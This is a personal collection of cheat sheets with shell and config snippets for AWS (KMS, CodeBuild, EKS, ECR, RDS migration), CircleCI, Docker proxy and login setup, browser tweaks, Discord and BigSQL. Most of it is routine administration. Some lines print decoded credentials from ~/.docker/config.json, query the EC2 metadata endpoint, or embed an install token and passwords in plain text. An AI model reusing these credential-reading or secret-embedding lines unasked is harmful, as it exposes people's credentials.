aws kms decrypt --ciphertext-blob fileb://ExampleSecretFileEncrypted   --output text --query Plaintext > ExampleFileDecrypted.base64  --region eu-west-2
# base64 decode
cat ExampleFileDecrypted.base64 | base64 --decode > ExampleFileDecrypted.txt

certutil -decode .\ExampleFileDecrypted.base64 .\ExampleFileDecrypted.txt

CloudFormation

aws_service_abbr="cloudformation"
aws-cli-doc
aws-faq
aws-console

# cloudformation designer web
google-chrome "https://"$AWS_REGION".console.aws.amazon.com/cloudformation/designer/home?region="$AWS_REGION
aws cloudformation describe-stacks --region us-east-1

CloudFormation macros

cloud formation macros


OpsWorks

configuration management service that helps you configure and operate applications in a cloud enterprise by using Puppet or Chef.


Security

security links

Sign api request

Threat model


CodeBuild

A fully managed continuous integration service ( to build, test, and package source code )

aws_service_abbr="codebuild"

codebuild start locally

prepare local docker image

git clone https://github.com/aws/aws-codebuild-docker-images.git
cd aws-codebuild-docker-images/ubuntu/standard/7.0/
docker build -t aws/codebuild/standard:7.0 .

download script for local run

# https://github.com/aws/aws-codebuild-docker-images/blob/master/local_builds/codebuild_build.sh
wget https://raw.githubusercontent.com/aws/aws-codebuild-docker-images/master/local_builds/codebuild_build.sh

minimal script

build environment variables

echo 'version: 0.2
phases:
    pre_build:
        commands:
            - echo "script 01.01"
            - echo "script 01.02"
    build:
        commands:
            - echo "script 02.01"
            - echo "script 02.02"
            - echo "script 02.03"
' > buildspec-example.yml

run script

# https://docs.aws.amazon.com/codebuild/latest/userguide/build-env-ref-available.html
/bin/bash codebuild_build.sh \
-i aws/codebuild/standard:7.0 \
-a /tmp/cb \
-b buildspec-example.yml \
-s `pwd` -c -m 

create project

aws codebuild list-projects 

# aws codebuild batch-get-projects --names aws-dockerbuild-push2ecr
aws codebuild create-project --cli-input-json file://codebuild-project.json

EKS Elastic Kubernetes Service

A managed Kubernetes service ( deploy, manage, and scale containerized applications using Kubernetes )

Leader Nodes == Control Plane

aws_service_abbr="eks"

# kubectl setup 
CLUSTER_NAME=my_cluster_name
aws eks update-kubeconfig --region $AWS_REGION --name $CLUSTER_NAME

# list of clusters and nodegroups
for each_cluster in `aws eks list-clusters | jq -r .clusters[]`; do
    echo "cluster: $each_cluster"
    aws eks list-nodegroups --cluster-name $each_cluster
    echo "-------"
done

EKS Cluster

Policies: AmazonEKSClusterPolicy

EKS Node (Group)

Policies mandatory: AmazonEKSWorkerNodePolicy, AmazonEC2ContainerRegistryReadOnly, AmazonEKS_CNI_Policy, AmazonEMRReadOnlyAccessPolicy_v2
Policies not mandatory: CloudWatchAgentServerPolicy

Install CloudWatch agent

ClusterName=$YOUR_CLUSTER_NAME_HERE
RegionName=$YOUR_AWS_REGION_HERE
FluentBitHttpPort='2020'
FluentBitReadFromHead='Off'
FluentBitReadFromTail='On'
FluentBitHttpServer='On'
curl https://raw.githubusercontent.com/aws-samples/amazon-cloudwatch-container-insights/latest/k8s-deployment-manifest-templates/deployment-mode/daemonset/container-insights-monitoring/quickstart/cwagent-fluent-bit-quickstart.yaml | sed 's/{{cluster_name}}/'${ClusterName}'/;s/{{region_name}}/'${RegionName}'/;s/{{http_server_toggle}}/"'${FluentBitHttpServer}'"/;s/{{http_server_port}}/"'${FluentBitHttpPort}'"/;s/{{read_from_head}}/"'${FluentBitReadFromHead}'"/;s/{{read_from_tail}}/"'${FluentBitReadFromTail}'"/' | kubectl apply -f -

typical amount of pods in kube-system

# kubectl get pods -n kube-system
aws-node 
coredns
kube-proxy
metrics-server

ECS Elastic Container Service

ecs
ecs

ECS on Fargate

  1. create docker image
  2. create repository
  aws ecr create-repository --repository-name my-name;    
  aws ecr describe-repositories --query 'repositories[].[repositoryName, repositoryUri]' --output table
  export REPOSITORY_URI=$(aws ecr describe-repositories --query 'repositories[].[repositoryUri]' --output text)
  echo ${REPOSITORY_URI}
  1. docker login
export ACCOUNT_ID=$(aws sts get-caller-identity --output text --query Account)
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
export AWS_REGION=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')
aws ecr get-login-password --region ${AWS_REGION} | docker login --username AWS --password-stdin ${ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com
  1. tag docker image docker tag my-image:latest ${REPOSITORY_URI}:latest
  2. push docker image: docker push ${REPOSITORY_URI}:latest
    aws ecr describe-images --repository-name my-image
  3. aws ecs create-cluster --cluster-name my-cluster
  4. aws ecs register-task-definition --cli-input-json file://task_definition.json
  5. aws ecs create-service --cli-input-json file://service.json
  6. aws ecs describe-clusters --cluster my-cluster "runningTasksCount": 1

ECR AWS Elastic Container Registry:

A fully managed Docker container registry ( store, manage, and deploy docker images for EKS)

aws_service_abbr="ecr"
aws_ecr_repository_name=udacity-cherkavi
aws ecr create-repository  --repository-name $aws_ecr_repository_name  --region $AWS_REGION
# aws ecr delete-repository --repository-name udacity-cherkavi

# list of all repositories 
aws ecr describe-repositories 

# list of all images in repository
aws ecr list-images  --repository-name $aws_ecr_repository_name 

docker login

# login with account id
AWS_ACCOUNT_ID=`aws sts get-caller-identity --query Account | jq -r . `
docker login -u AWS -p $(aws ecr get-login-password --region ${AWS_REGION}) ${AWS_ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com

# login with aws username/password
aws ecr get-login-password --region ${AWS_REGION} | docker login --username AWS --password-stdin ${AWS_ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com

# check connection
aws ecr get-authorization-token

docker push local container to ECR

aws_ecr_repository_uri=`aws ecr describe-repositories --repository-names $aws_ecr_repository_name | jq -r '.repositories[0].repositoryUri'`
echo $aws_ecr_repository_uri

docker_image_local=050db1833a9c
docker_image_remote_tag=20230810
docker_image_remote_name=$aws_ecr_repository_uri:$docker_image_remote_tag
docker tag  $docker_image_local $docker_image_remote_name

# push to registry
docker push $docker_image_remote_name

# pull from 
docker pull $docker_image_remote_name

STS Security Token Service

aws_service_abbr="sts"

# get account get user id
aws sts get-caller-identity 
aws sts get-caller-identity --query Account
aws sts get-caller-identity --query UserId
# aws sts get-access-key-info --access-key-id 

logic orchestrator AWS Glue can be one of the step ( similar service )


Code Commit

how to clone remote repository

  1. create new profile (aws_profile_in_aws_credentials) in ~/.aws/credentials
  2. execute next commands
git config --global credential.helper '!aws codecommit credential-helper $@'
git config --global credential.UseHttpPath true
AWS_PROFILE=aws_profile_in_aws_credentials
git config --global credential.helper "!aws --profile $AWS_PROFILE codecommit credential-helper $@"
  1. check your settings:
cat ~/.gitconfig
# check the section: 
# [credential]
#         helper = "!aws --profile aws_profile_in_aws_credentials codecommit credential-helper $@"
#         UseHttpPath = true
# !!! should be not like:
# helper = "aws s3 ls --profile aws_profile_in_aws_credentials codecommit credential-helper "

# fix it otherwise
git config --global --edit 
  1. clone your repo with https

Code Build

flowchart RL;
    subgraph buildtime
        pr[project] --o cb[Code Build]
        r[role] --o pr
        pl[policy] --o r
        s3[s3] --o pr

        git[git 
            repo] -.->|w| pr

        pr -.-> 
        i[container 
        image]

        i --o ecr[ECR]

        i -.-> d[deployment]
    end

    subgraph runtime
        p[pod] --o n[node]

        n --o 
        ng[node 
           group]

        ng --o eks
        c[Cluster] --o eks[EKS]
    end

    d ----|service| p

Loading

orchestration tool orchestration tool documentation

pip install seed-farmer

in case of issue:

AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
pip3 install pyOpenSSL --upgrade


Cognito

authentication, authorization, user pool, identity pool


run containers as Lambda functions


Shield

schield


Firewall

firewall


Launch Template

flowchart LR;
    lt[Launch 
       Template] --o 
    as[Auto
    Scaling]
Loading

Launch Configuration

flowchart LR;
    lt[Launch 
       Configuration] --o 
    as[Auto
    Scaling]
Loading

Glue

Extract Transform Load see: Data Pipeline

flowchart LR;

s[source] -.-> gc[Glue Crawler] -.-> gdc[Glue  Data Catalog] -.-> etl[ETL jobs] -.-> d[dest]

rds[RDS] --extend--> s
S3 --extend--> d
rds ~~~ d
Loading

Amazon X-Ray

http header for tracing: x-amzn-trace-id


cloud9


Code Services

  • source
    • code repository
    • vscode: aws toolkits, amazon q
  • build
    • codePipeline
      • codeguru
      • codebuild
      • codeartifacts
  • deploy
    • codedeploy
  • monitor
    • X-Ray

QuickSight


cloudsearch


ElasticSearch


personal health dashboard


app sync


FIS - Fault Injection Service

stress an application by creating disruptive events so that you can observe how your application responds ( chaos engineering ).


examples

image


upcoming courses todo

evaluate->make plans->test plans->reformat plan->test plan->performing

business point of view

  • function by function
  • component by component

collaboration of external maintenance/migration team with "on-site"

  • Factory - external team producing components or functions for customer
  • Assisted - people assigned to project and working in parallel with customer
  • Camps - specific groups (each group based on focus) of people are waiting for serving customer requests

planning and milestones

  • rehost ( one-to-one )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • replatform (one-to-one with optimization, replace with existing AWS services )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Evaluate appropriate service replacements
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • repurchase ( using AWS services + AWS Marketplace with configured machines )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Evaluate appropriate service replacements
    • Analyze migration services
    • Identify migration plan
    • Purchase necessary software/components
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • refactor reachitect ( what should be re-architected -> SOA )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Evaluate appropriate service replacements
    • Identify appropriate architecture
    • Analyze migration services
    • Identify migration plan
    • Build test architecture
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • retire ( what may not be migrated )
    • Specify Migration Goals
    • Identify data to migrate
    • Identify unnecessary components
    • Discover components to migrate
    • Retire unnecessary components
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • retain ( not ready, not necessary to migrate )
    • Specify Migration Goals
    • Identify data to migrate
    • Identify best environment for each component
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test

Requirements

  • Platform review and considerations
  • Key parameters of new environment
  • Can app affort downtime, how long ?
  • Data migration - now or later ?

Network limitation

^|------------------------------|------------| T| DirectConnect/StorageGateway | Snowmobile | i|------------------------------|------------| m| transfer to S3 directly | Snowball | e|------------------------------|------------| size of data --->

AWS Server Migration Service

requirements

  • available for: VMware vSphere, Microsoft Hyper-V, Azure VM
  • replicate to AmazonMachineImages ( EC2 )
  • using connector - BSDVM that you should install into your environment

AWS Migration Hub

  • Amazon CloudEndure,
  • AWS ServerMigrationService
  • AWS DatabaseMigrationService
  • Application Discovery Service
  • Application Discovery Agents

Application Discovery Service

perform discovery and collect data

  • agentless ( working with VMware vCenter )
  • agent-based ( collecting processes into VM and exists network connections )

Migration steps

  • Disover current infrastructure
  • Experiment with services and copy of data
  • Iterate with another experiment ( using other services )
  • Deploying to AWS

Percona XtraBackup

installation

wget https://repo.percona.com/apt/percona-release_latest.$(lsb_release -sc)_all.deb
sudo dpkg -i percona-release_latest.$(lsb_release -sc)_all.deb
sudo apt-get update
# MySQL 5.6, 5.7; for MySQL 8.0 - XtraBackup 8.0
sudo apt-get -y install percona-xtrabackup-24

create backup

sudo xtrabackup --backup --stream=tar --user=my_user --password=my_password | gzip -c > /home/ubuntu/xtrabackup.tar.gz

list of policies for role

AWSApplicationDiscoveryAgentAccess
AmazonS3FullAccess
AWSCloud9Administrator
RDS-Policy
CF-Policy
IAM-Policy

create new instance with db

aws rds restore-db-instance-from-s3  --db-instance-identifier ghost-db-mysql --db-instance-class db.t2.large  --engine mysql  --source-engine mysql  --source-engine-version 5.7.22  --s3-bucket-name <FMI>  --s3-ingestion-role-arn "<FMI>"  --allocated-storage 100 --master-username admin  --master-user-password foobarfoobar --region <FMI>

check status

aws rds describe-db-instances --db-instance-identifier ghost-db-mysql --region <FMI> --query DBInstances[0].DBInstanceStatus

Database migration service

  • create replication instance
  • create source endpoint
  • create target endpoint
  • create database migration task
  • registration, get free migration license
  • IAM policy
  • Create user IAM user
  • CloudEndure->select source and destination regions
  • CloudEndure->Setup & Info->write down AccessKeyId & SecretAccessKey
  • CloudEndure->Machines How to Add Machines
  • Install agent on EC2 instance
    wget -O ./installer_linux.py https://console.cloudendure.com/installer_linux.py
    sudo python ./installer_linux.py -t 0B7F-A786-6F8F-0727-08E2-0CB1-B758-7E41-4D03-7A47-8C2A-129A-8CFE-B115-09EA-A1EC --no-prompt
  • CloudEndure->LaunchTargetMachines->TestMode ( check JobProgress )
  • EC2 instance list
  • check ip addresses in new EC2

Secret Manager

secrets store
pay attention to Parameter Store

Systems Manager Parameter Store

Primarily used for storing configuration data and parameters ( database connection strings, passwords, license codes )

DataSets cheat sheet

BigSQL cheat sheet

overview how to run query

Warehouse

default directory (/special-folder/hive/warehouse) in HDFS to store tables

Schema

directory (/special-folder/hive/warehouse/user-personal-schema) to store tables ( can be organized in schema )

Table

directory (/special-folder/hive/warehouse/user-personal-schema/my-table-01) with zero or more files

Partitions

additional sub-directory to save special data for the table

/special-folder/hive/warehouse/user-personal-schema/my-table-01/my-column-country=USA
/special-folder/hive/warehouse/user-personal-schema/my-table-01/my-column-country=GERMANY

commands

bigsql/bin start
bigsql/bin stop
bigsql/bin status

configuration

bigsql-conf.xml

switch on compatability mode

use Big SQL 1.0 into Big SQL

set syshadoop.compatability_mode=1;

Data types

compare data types

  • Declared type
  • SQL type
  • Hive type

using strings

  • avoid to use string - default value 32k
  • change default string length
set hadoop property bigsql.string.size=128
  • use VARCHAR instead of

datetime ( not date !!! )

2003-12-23 00:00:00.0

boolean

boolean workaround

create schema

create schema "my_schema";
use "my_schema"
drop schema "my_schema" cascade;

create table ( @see hive.md )

create hadoop table IF NOT EXISTS my_table_into_my_schema ( col1 int not null primary key, col2 varchar(50)) 
row format delimited 
fields terminated by ',' 
LINES TERMINATED by '\n'
escaped BY '\\', 
null defined as '%THIS_IS_NULL%' s
stored as [<empty>, TEXT, BINARY] SEQUENCEFILE;
-- PARQUETFILE
-- ORC
-- RCFILE
-- TEXTFILE

avro table creation: avro table

insert

  • insert values (not to use for prod) - each command will create its personal file with records
insert into my_table_into_my_schema values (1,'first'), (2,'second'), (3,'third');
  • file insert - copy file into appropriate folder ( with delimiter between columns )
call syshadoop.hcat_cache_sync('my_schema', 'my_table_into_my_schema');
  • create table based on select
CREATE HADOOP TABLE new_my_table STORED AS PARQUETFILE AS SELECT * FROM my_table_into_my_schema;
  • load data
LOAD HADOOP USING FILE URL 'sftp://my_host:22/sub-folder/file1' 
WITH SOURCE PROPERTIES ('field.delimiter' = '|')
INTO TABLE my_table_into_my_schema APPEND;

null value

  • BigSQL 1.0 - ''
  • BigSQL - \N
  • can be specified as part of table creation
NULL DEFINED AS 'null_representation'

JSqsh

CLI tool to work with any JDBC driver ( Java SQl SH )

Blockchain, Ledger assets (Bitcoin)

solutions

Corda is an open-source platform for the development and deployment of distributed multi-party applications.

education links

bitcoin theory

PyBitMessage/src/bitmessagemain.py

other

Apache Cassandra cheat sheet

  • one of the Base Availability Soft_state Eventually_consistent storage
  • using CassandraQueryLanguage for querying data
  • no master, managed by background daemon process

levels of data

  • KeySpace
  • ColumnFamily
  • Column
  • Key

Columns

 FamilyColumn <>---------- Column

SuperFamilyColumn <>----- SuperColumn CompositeColumn

Reading modes:

  • one: from first node
  • quorum: when more than 50% of nodes responded
  • all ( consistent ): when all nodes answered

Writing modes:

  • zero: no wait, just send data and close connection by client
  • any: at least one node should answered
  • one: node answered, commit log was written, new value placed in memory
  • quorum: more than 50% confirmed
  • all: all nodes confirmed writing

google chrome cheat sheet

how to install

x-www-browser https://www.google.com/chrome/thank-you.html?brand=CHBD&statcb=0&installdataindex=empty&defaultbrowser=0
# remove chrome cache: 
rm -rf ~/.cache/google-chrome
rm -rf ~/.config/google-chrome
sudo dpkg -i ~/Downloads/google-chrome-stable_current_amd64.deb

internal links

firefox system links about:about

  • system settings
  • applications
  • extensions

extensions folder

# chrome
cd $HOME/.config/google-chrome/Default/Extensions/
# chromium
cd $HOME/snap/chromium/common/chromium/Default/Extensions/

find names of all installed extensions with path to them

EXT_PATH=$HOME/snap/chromium/common/chromium/Default/Extensions/
for each_file in `find $EXT_PATH -name "manifest.json"`; do
    echo $each_file
    cat $each_file | grep '"name": '
done

alternative way of finding names of all installed plugins/extensions

CHROME_CONFIG=$HOME/.config/google-chrome
IFS=$'\n'
for each_file in `find $CHROME_CONFIG | grep manifest.json$`; do
    echo $each_file
    cat $each_file | grep '"name": '
done

application

## folder
ll "$HOME/snap/chromium/common/chromium/Default/Web Applications/Manifest Resources/"

## start application
/snap/bin/chromium --profile-directory=Default --app-id=cifhbcnohmdccbgoicgdjpfamggdegmo

link anchor, link to text, highlight text on the page, find text on the page, text fragments

x-www-browser https://github.com/cherkavi/cheat-sheet/blob/master/architecture-cheat-sheet.md#:~:text=Architecture cheat sheet&text=Useful links

# also possible to say prefix before the text
x-www-browser https://github.com/cherkavi/cheat-sheet/blob/master/architecture-cheat-sheet.md#:~:text=Postponing,%20about

# aslo possible to say previx and suffix around the destination text

firefox

prevent to open in private mode

sudo mkdir -p /etc/firefox/policies
echo '
{
  "policies": {
    "DisablePrivateBrowsing": true
  }
}
' >> /etc/firefox/policies/policies.json

circle-ci

setup

  • token
  • visual code extension: circleci.circleci
  • install cli
    sudo snap install circleci
    circleci setup
    # update your ~/.bashrc
    eval "$(circleci completion bash)"
    export CIRCLECI_CLI_HOST=https://circleci.com
    
    circleci setup

working loop

setup new project

  1. create repository in github/gitlab
  2. create file .circleci/config.yml in repository
# CircleCI configuration file
version: 2.1

jobs:
  # first job
  print_hello:
    docker:
      - image: cimg/base:2022.05
    steps:
      - run: echo "--- 1.step"
      - run: echo "hello"
      - run: echo "----------"

  # second job
  print_world:
    docker:
     - image: cimg/base:2022.05
    steps:
      - run: 
          name: print world
          command: | 
            echo "--- 2.step"
            echo "world"
            echo "----------"
 
workflows:
  # Name of workflow
  my_workflow_1:
    jobs:
      - print_hello
      - print_world:
          requires: 
            - print_hello
circleci validate
  1. connect circleci to project

webhook will be created in the project

try catch job

try catch on job level

jobs:
    job_name:
        docker:
            - image: cimg/base:2022.05
        steps:
            - run: echo "hello"
            - run: 
                name: error simulation
                command: |  
                    return 1
            - run:
                name: catch possible previous errors
                command: |
                    echo "time to execute rollback operation"
                when: on_fail

other possible conditions:

when:
    environment:
        MY_VAR: "true"
when:
    # of previous step
    status: success
when:
    branch:
        only:
            - master
            - develop
when: |
    steps.branch.matches('feature/*') || steps.branch.matches('bugfix/*')

try catch on command level

jobs:
    job_name:
        docker:
            - image: cimg/base:2022.05
        steps:
            - run: 
                name: error simulation
                command: |  
                    return 1
                on_fail:
                    - run:
                        name: catch exception
                        command: |
                            echo " time to execute rollback operation"

job examples

job cloudformation

  run_cloudformation: 
    docker:
      - image: amazon/aws-cli
    steps:
      - checkout
      - run:
          name: run cloudformation
          command: |
            aws cloudformation deploy \
              --template-file my-template-file.yml \
              --stack-name my-template-file-${CIRCLE_WORKFLOW_ID:0:5} \
              --region us-east-1
jobs:
    job_name:
        docker: 
        - image: cimg/base:2022.05
        environment:
            CUSTOM_MESSAGE: "<< pipeline.project.git_url >> :: << pipeline.trigger_parameters.gitlab.commit_message>>"
        steps:
        - run: echo "$CUSTOM_MESSAGE"
version: 2.1

parameters:
  my_custom_parameter_1:
    type: string
    default: "~/"

jobs:
    job_name:
        docker: 
        - image: cimg/base:2022.05
        environment:
            CUSTOM_MESSAGE: "<< pipeline.parameters.my_custom_parameter_1 >>"

job with parameters

jobs:
  my_job_1:
    parameters:
      my_custom_parameter_1:
        type: string
        default: my_org
    docker:
      - image: cimg/base:2020.01
    steps:
      - run: echo "  << parameters.my_custom_parameter_1 >>  "

workflows:
  my_workflow_1:
    jobs:
      - my_job_1:
          my_custom_parameter_1: my_organization          
      - my_job_1:
          my_custom_parameter_1: another organization

can be installed from: Project Settings -> Environment Variables all env variables will be hidden as secrets ( no output in console will be visible)

triggering pipeline

  • webhook
    • new commit in branch
    • pull/merge request
  • api
    • command-line tool
    • chat message
  • schedule
  • other pipeline

jobs communication

cache ( folders & files )

ttl - only during run of pipeline immutable after creation

# https://circleci.com/docs/configuration-reference/#savecache
- save_cache:
    key: |
      maven_repo-{{ .Branch }}-{{ .Revision }} 
      result_of_build-{{ .Branch }}-{{ .Revision }}
    paths:
      - ~/.m2
      - target/application-with-dependencies.jar
# https://circleci.com/docs/configuration-reference/#restorecache
- restore_cache:
    keys:
      - maven_repo-{{ .Branch }}-{{ .Revision }} 
      - result_of_build-{{ .Branch }}-{{ .Revision }}

workspace

mutable

# https://circleci.com/docs/configuration-reference/#persisttoworkspace
- persist_to_workspace:
    root: /tmp/my_folder_1
    path:
      - target/appliaction.jar
      - src/config/settings.properties
# https://circleci.com/docs/configuration-reference/#attachworkspace
- attach_workspace:
    at: /tmp/my_folder_1

secret keeper

job manual approval

      - hold: 
          type: approval # "On Hold"

Local usage

how to execute job

JOB_NAME=job_echo
circleci local execute --job $JOB_NAME
# example for Ubuntu
wget https://mega.nz/linux/repo/xUbuntu_24.04/amd64/megacmd-xUbuntu_24.04_amd64.deb && sudo apt install "$PWD/megacmd-xUbuntu_24.04_amd64.deb"

login

mega-login $MEGA_USER $MEGA_PASS

check login

mega-whoami
mega-df
mega-du

mega interactive mode

mega-cmd

get file

mega-ls
# mega-tree

# copy name of one of the file 
mega-get FILENAME

Crossplane

  • K8S extension for managing resources of K8S and non-K8S via (providers) with watching a state for them.
  • Similar to Terraform and Pulumi ( and can manage them )
  • CLI interface

Namespace

namespace: crossplane-system
kind: managed resource

deployments

> kubectl get deployments -n crossplane-system
NAME                      READY   UP-TO-DATE   AVAILABLE 
crossplane                1/1     1            1         
crossplane-rbac-manager   1/1     1            1         

Resources

flowchart LR 

c[crossplane] ---o k[k8s]
c <-.->|r/w| e[etcd]

p[providers] --o c

p --> cr[composition
         resource]  --> m[managed 
                          resource]

p --> cm[composition] --> cr

Loading

resolve issues

  • resource map
  • logs

Links

CSS cheat sheet

links

Units

  • Absolute: mm, in, px(1/96 inch)
  • Relative: em (parEnt), rem(Root), vh/vw (ViewHeight/ViewWidht), vp (ViewPort),

position on the screen: static, relative, absolute, fixed, sticky

position inside own space or parent element or screen position

visibility

  • visible
  • hidden - render it, but with empty place
  • inherit

display

display among other elements or/and in the line

  • inline

    [element][element] min height & width - no control

  • block

    [ ......element....... ] fill the whole row on the screen height & width

  • inline-block

    [element] with height & width

  • flex

    [element][element][element]

  • table

    [element][element][element] with predefined hight

  • grid

    [element]\n [element]\n

  • none

    no element in layout, no dedicated place

inline, inline-block, block

inline, inline-block, block

display: flex

display flex

display: grid

display grid

D3 cheat sheet

alternatives

Examples

logging

      function log(sel,msg) {
         console.log(msg,sel);
      }


    svg
      .append("text")
      .attr("x", 0)
      .attr("y", -20)
      .attr("class", "svg_diagram_title")
      .text(title)
      .call(log,title)
      ;

Issues

diagram not showing

if you don't see any images - check your selector, 
D3 will not complain about 'target element not found '!!!!

SOLUTION: fast and small example

<html lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <script src="d3.v5.js"></script>
</head>
<body>
  <svg id="dataviz_area" height=200 width=450></svg>
  <script>
    // MUST BE DECLARED AFTER TARGET ELEMENT DECLARATION
    d3.select("#dataviz_area").append("div").html("hello")
  </script>
</body>
</html>

create link to your profile

  1. copy UserId from your profile ( avatar in left bottom corner )

    maybe need to activate "Development Mode" settings -> Advanced: developer mode - on

  2. insert your DISCORD_USER_ID at the end of the link: https://discord.com/users/$DISCORD_USER_ID

Obtain BOT Token

  1. https://discord.com/developers/applications
  2. new application
  3. bot
  4. add bot
  5. reset your token
  6. save your token in environment variable DISCORD_BOT_TOKEN

add bot to your channel

not possible to read direct messages

read your messages from channel

DISCORD_CHANNEL_ID=my_channel_id
curl -H "Authorization: Bot $DISCORD_BOT_TOKEN" "https://discord.com/api/v10/channels/${DISCORD_CHANNEL_ID}/messages?limit=10"

Docker cheat sheet

links

Ecosystem

  • Docker Daemon
  • Docker Volume - store persist data
  • Docker Client - CLI, gui analogue ( Kitematic )
  • Docker Compose - Python app over Docker Daemon
  • Docker Swarm
  • Docker HUB
  • Docker Cloud

installation ( Debian )

docker desktop

sudo apt install docker.io
# start daemon on Debian
sudo systemctl start docker
sudo systemctl enable docker
#!/bin/bash
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-get install -y docker-ce

usermod -aG docker ubuntu
docker run -p 8080:8080 tomcat:8.0

docker manager

bash completion

curl -o ~/.docker-machine.bash  https://raw.githubusercontent.com/docker/machine/master/contrib/completion/bash/docker-machine.bash 

update your bashrc

. ~/.docker-machine.bash

Architecture

architecture

Tools

information about docker itself

docker info
docker system info

settings files

/etc/docker/daemon.json
/etc/default/docker 
~/.docker/config.json
/etc/systemd/system/docker.service.d/http-proxy.conf

how to skip typing "sudo" each time, without sudo

# new group in sudo for docker
sudo groupadd docker
# add current user into docker group
sudo usermod -aG docker $USER 

# restart service
sudo service docker restart
# restart daemon
systemctl daemon-reload
# refresh sudo 
sudo reboot

Docker Issue:

Couldn't connect to Docker daemon at http+docker://localhost - is it running?
sudo usermod -a -G docker $USER
sudo systemctl enable docker # Auto-start on boot
sudo systemctl start docker # Start right now
# reboot

Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock

logout and login again


standard_init_linux.go:228: exec user process caused: exec format error
WORKDIR /opt/airflow
ENTRYPOINT ["./entrypoint.sh"]

also can be helpful to check entrypoint for UNIX (LF) as new line ( instead of windows CR LF )

proxy set up:

proxy for daemon

  • /etc/systemd/system/docker.service.d/10_docker_proxy.conf
[Service]
Environment=HTTP_PROXY=http://1.1.1.1:111
Environment=HTTPS_PROXY=http://1.1.1.1:111

or

[Service]    
Environment="HTTP_PROXY=http://webproxy.host.de:3128/" "NO_PROXY=localhost,127.0.0.1,.host.de,.viola.local,.local"
sudo shutdown -r now
  • /etc/sysconfig/docker
HTTP_PROXY="http://user01:[email protected]:8080"
HTTPS_PROXY="https://user01:[email protected]:8080"

proxy for docker client to pass proxy to containers

  • ~/.docker/config.json
{
 "proxies":
 {
   "default":
   {
     "httpProxy": "http://127.0.0.1:3001",
     "noProxy": "*.test.example.com,.example2.com"
   }
 }
}
# restart docker with daemon
sudo systemctl daemon-reload && sudo systemctl restart docker
# or
sudo systemctl restart docker.service
# or 
sudo service docker restart
  • docker run --env-file environment.file {image name}

( or via -e variables )

HTTP_PROXY=http://webproxy.host:3128
http_proxy=http://webproxy.host:3128
HTTPS_PROXY=http://webproxy.host:3128
https_proxy=http://webproxy.host:3128
NO_PROXY="localhost,127.0.0.1,.host.de,.viola.local"
no_proxy="localhost,127.0.0.1,.host.de,.viola.local"
  • /etc/default/docker
export http_proxy="http://host:3128/"
  • if all previous options not working ( due permission ) or you need to execute (apt install, wget, curl, ... ):
    • build arguments
    sudo docker build \
    --build-arg rsync_proxy=http://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --build-arg https_proxy=https://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --build-arg http_proxy=http://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --build-arg no_proxy=localhost,127.0.0.1,.localdomain,.ubsroup.net,.ubs.corp,.cn.sub,.muc,.vantage.org \
    --build-arg ftp_proxy=http://$TSS_USER:$TSS_PASSWORD@proxy.muc:8080 \
    --file Dockerfile-firefox .
    • change Docker file with additional lines ( not necessary, only for earlier docker version )
    ARG rsync_proxy
    ENV rsync_proxy $rsync_proxy
    ARG http_proxy
    ENV http_proxy $http_proxy
    ARG no_proxy
    ENV no_proxy $no_proxy
    ARG ftp_proxy
    ENV ftp_proxy $ftp_proxy
    ...
    # at the end of file
    unset http_proxy
    unset ftp_proxy
    unset rsync_proxy
    unset no_proxy

login, logout

docker login -u cherkavi -p `oc whoami -t` docker-registry.local.org
docker logout docker-registry.local.org
# for artifactory you can use token as password

check login

cat ~/.docker/config.json | grep "auth\":" | awk -F '"' '{print $4}' | base64 -d -

check login without access to config

echo "" | docker login docker-registry.local.org
echo $?

issue

...
6c01b5a53aac: Waiting 
2c6ac8e5063e: Waiting 
cc967c529ced: Waiting 
unauthorized: authentication required

solution

rm -rf ~/.docker/config.json
# or just remove one record inside "auths" block with your url-repo
docker logout url-repo

restart Docker service

sudo systemctl daemon-reload
sudo systemctl restart docker
sudo systemctl show docker
# restart docker
sudo systemctl restart docker.service

Images

search image into registry, find image, catalog search

docker search <text of search>

inspect image in repository inspect layers analyse image show layers image xray

## skopeo
# sudo apt-get -y install skopeo
# or: https://ftp.de.debian.org/debian/pool/main/s/skopeo/
skopeo inspect docker://registry.fedoraproject.org/fedora:latest
# show all executed command lines list of commands in docker container 
skopeo inspect --config docker://registry.fedoraproject.org/fedora:latest | grep -e "CMD" -e "ENTRYPOINT"

## dive
# https://github.com/wagoodman/dive
